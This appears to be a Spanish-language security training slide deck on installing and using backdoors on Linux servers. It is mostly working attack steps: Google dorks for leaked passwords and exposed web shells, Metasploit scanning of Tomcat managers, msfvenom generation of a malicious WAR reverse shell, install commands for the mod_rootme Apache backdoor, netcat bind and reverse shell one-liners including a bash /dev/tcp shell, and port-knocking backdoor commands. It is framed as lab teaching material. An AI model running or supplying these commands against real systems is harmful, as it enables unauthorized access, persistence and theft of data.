Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors...
Transcript of Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors...
![Page 1: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/1.jpg)
Backdoors en Sistemas Operativos
Instalación, configuración y uso de Backdoors
![Page 2: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/2.jpg)
AGENDA1. ¿Quién soy?
2. Casos de Seguridad Informática en el Perú y el
mundo
3. Buscando vulnerabilidades backdoors
4. ¿Qué es un backdoor?
1. Backdoor SETUID
2. Backdoor Módulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
5. Instalando y configurando backdoors (ejemplos)
6. Información sobre el curso
7. Conclusiones
![Page 3: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/3.jpg)
AGENDA
1. ¿Quién soy?
2. Casos de Seguridad Informática en el Perú y el
mundo
3. Buscando vulnerabilidades
4. ¿Qué es un backdoor?
5. Instalando y configurando backdoors
(ejemplos)
6. Conclusiones
![Page 4: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/4.jpg)
#whoami• Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH,
C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002
• Instructor Oficial de MILE2
• Consultor de Kunak Consulting SAC
http://www.kunak.com.pe
• Psicólogo que aun no comienza sus estudios….
• Escritor en mis tiempos libres:
http://www.el-palomo.com
• Correo electrónico:
• Cuenta de Facebook:
• www.facebook.com/El.Palomo.Seguridad.Informacion
![Page 5: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/5.jpg)
AGENDA
1. ¿Quién soy?
2. Casos de Seguridad Informática en el Perú y el
mundo
3. Buscando vulnerabilidades
4. ¿Qué es un backdoor?
5. Instalando y configurando backdoors
(ejemplos)
6. Conclusiones
![Page 6: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/6.jpg)
¿Quiénes nos
amenazan?
![Page 7: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/7.jpg)
Y esto….¿en realidad pasa?
![Page 8: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/8.jpg)
Y esto….¿en realidad pasa?
![Page 9: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/9.jpg)
Hacktivistas – 54%
Hackers Independientes – 68%
Colaboradores Internos – 90%
Fuente E&Y Encuesta Global de Seguridad de Inf.
2014
Contratistas o proveedores–
66%
![Page 10: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/10.jpg)
DEMANDA y OFERTA de Hacking en el Perú
![Page 11: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/11.jpg)
Una fuerte OFERTA
![Page 12: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/12.jpg)
Una fuerte OFERTA
![Page 13: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/13.jpg)
Y una más fuerte DEMANDA
![Page 14: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/14.jpg)
Y una más fuerte DEMANDA
![Page 15: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/15.jpg)
Y una más fuerte DEMANDA
![Page 16: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/16.jpg)
Y una más fuerte DEMANDA
![Page 17: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/17.jpg)
Y una más fuerte DEMANDA
![Page 18: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/18.jpg)
Y una más fuerte DEMANDA
![Page 19: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/19.jpg)
Google Dorks para buscar backdoors
site:pastebin.com intext:@gmail.com | @yahoo.com |
@hotmail.com daterange:2457388-2457491
"Password=" inurl:web.config -intext:web.config ext:config
intitle:!C99Shell v. 1.0 site:.pe
filetype:php intext:"!C99Shell v. 1.0 beta“
Las personas siempre son los mejores backdoors
![Page 20: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/20.jpg)
AGENDA
1. ¿Quién soy?
2. Casos de Seguridad Informática en el Perú y el
mundo
3. ¿Qué es un backdoor?
4. Instalando y configurando backdoors
(ejemplos)
5. Conclusiones
![Page 21: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/21.jpg)
¿Qué es un Backdoor (puerta trasera)?
• Los backdoors son programasutilizados por los hackers para lograracceso a sistemas operativos demanera rápida y sencilla.
• Existen diferentes tipos debackdoors:
• Backdoors en Aplicaciones Web
• Backdoors a través de SETUID
• Backdoors en Módulos deServicios
• Backdoors del tipo Knocking
![Page 22: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/22.jpg)
AGENDA
1. ¿Quién soy?
2. Casos de Seguridad Informática en el Perú y el
mundo
3. ¿Qué es un backdoor?
4. Instalando y configurando backdoors
(ejemplos)
5. Conclusiones
![Page 23: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/23.jpg)
Arquitectura de los Ejemplos
TARGET
- Servidor TOMCAT vulnerable
- Aquí se instalaran los backdoors
- Sistema Operativo Linux
ATACANTE
- Computador desde el cual se
realizarán los ataques
- Sistema Operativo KALI LINUX 2
ATACANTE 2
- Computador desde el cual se
explotaran los backdoors
- Sistema Operativo Linux
Dirección IP: 192.168.4.131
Dirección IP: 192.168.4.130
Dirección IP: 192.168.4.132
![Page 24: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/24.jpg)
Identificar Servicios TOMCAT
• Buscamos TOMCAT en la RED LANa través de NMAP
Nmap –sV –p 8080 –sS TARGET
auxiliary/scanner/portscan/syn
Buscamos TOMCAT/AXIS2 enINTERNET:
Google Dork:
intitle:"Tomcat Server Administration“
intitle:"Axis2 Happiness Page" +ext:jsp
![Page 25: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/25.jpg)
Ahora si …. Vamos con los ejemplos
![Page 26: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/26.jpg)
Identificar Vulnerabilidades en TOMCAT
• Vamos a utilizar METASPLOIT para identificarvulnerabilidades:
Root> msfconsole
Root> search tomcat
Root> use auxiliary/scanner/http/tomcat_mgr_login
Root> show options
Root> set RHOSTS 192.168.4.130
Finalmente realizar la carga de un .WAR maliciosopara obtener acceso al sistema operativo.
msfvenom -p java/meterpreter/reverse_tcpLHOST=192.168.4.131 -f war > meterpreter.war
En el cliente:
Msf> use exploit/multi/handler
Msf> set payload java/meterpreter/reverse_tcp
![Page 27: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/27.jpg)
Backdoor con SETUID • De pronto algunos nunca escucharon de los
permisos GETUID, SETUID y STICKY. Pues estemecanismo de backdoor está asociado a SETUID.
¿Entonces en que consiste el SETUID?El SETUID es un bit que permite a las aplicacionesejecutarse con los permisos de su propietario. Elconcepto puede sonar muy abstracto pero si ponemosun ejemplo es más facil entender, vamos a crear unarchivo llamado TEST.C y lo compilamos.
![Page 28: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/28.jpg)
Backdoor con SETUID
![Page 29: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/29.jpg)
Backdoor en Apache Server
• Cargamos un módulo en APACHE de talmanera que no se realicen cambios a nivelde código en los aplicativos PHP.
• ¿Cuántos administradores de Sistemasverifican los módulos cargados enApache?
• Toca compilar un módulo de APACHEllamado ModROOTme.
https://github.com/jingchunzhang/backdoor_rootkit/tree/master/mod_rootme-0.4
![Page 30: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/30.jpg)
Backdoor en Apache Server
• Comandos en el Sistema Operativo
root>cd mod_rootme-0.4/
root>Make Linux
root> cp mod_rootme2.so /etc/httpd/modules
root> /etc/init.d/httpd reload
En el cliente:
Root> nc 192.168.4.130 80
GET root
![Page 31: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/31.jpg)
Backdoor: BindShell
• Las primeras herramientas utilizadospor Hackers fue la navaja suiza“NETCAT”.
• Una BindShell es un programacorriendo una SHELL dentro de unproceso de red.
• Una BindShell puede estar escrita encualquier lenguaje de programación.
http://netcat.sourceforge.net/download.php
![Page 32: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/32.jpg)
Backdoor: Bind Shell
• Comandos en el sistema operativo:root>./configure --enable-DGAPING_SECURITY_HOLE
root>Make
root> cd src/
root> ./netcat -l -p 8443 -e /bin/sh
root> bg
En el CLIENTE:
C:\>nc64.exe 192.168.75.133 8443
![Page 33: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/33.jpg)
Backdoor: Reverse Shell
• Tiene el mismo concepto que una
Bind Shell pero realizada de manera
reversa.
• Ahora es el servidor quien se
conecta a nuestro cliente. Esta
pensado para poder realizar
bypass de Firewalls.
![Page 34: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/34.jpg)
Backdoor: Reverse Shell
• Reverse Shell con BASH
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:bash -i >& /dev/tcp/192.168.1.34/8080 0>&1
![Page 35: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/35.jpg)
Backdoor: Reverse Shell
• Reverse Shell con NETCAT
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:./netcat -e /bin/sh 192.168.1.34 8080
![Page 36: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/36.jpg)
Backdoor: KnockOut
• Knock viene del ingles tocar lapuerta.
• Este es un backdoor del tipo“Reverse Shell” que pasadesapercibido.
• Sólo puede ser accedido poraquel que conozca lacombinación de la “puerta”correcta.
![Page 37: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/37.jpg)
Backdoor: KnockOut
• En el servidor:• Root> $make servidor
• Root> ./knock-outd knock-out.conf eth5
• En el cliente (atacante):• Root> $make cliente
• Root> ./knock-outc 192.168.4.130 knock-out.conf
• Root> ./netcat -lv -p 64876
![Page 38: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/38.jpg)
AGENDA
1. ¿Quién soy?
2. Casos de Seguridad Informática en el Perú y el
mundo
3. ¿Qué es un backdoor?
4. Instalando y configurando backdoors
(ejemplos)
5. Información sobre el curso
6. Conclusiones
![Page 39: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/39.jpg)
Conclusiones:
- Instalar backdoors es la manera mas sencilla
de acceder a servidor comprometidos.
- Cuando un servidor Linux es “comprometido”
se recomienda reestablecer un backup ya que
detectar backdoors o rootkits es muy
complicado.
![Page 40: Backdoors en Sistemas Operativos - | Blog de Omar · Google Dorks para buscar backdoors site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491 "Password="](https://reader034.fdocuments.co/reader034/viewer/2022042505/5ae42f677f8b9a0d7d8eaac7/html5/thumbnails/40.jpg)
¿PREGUNTAS?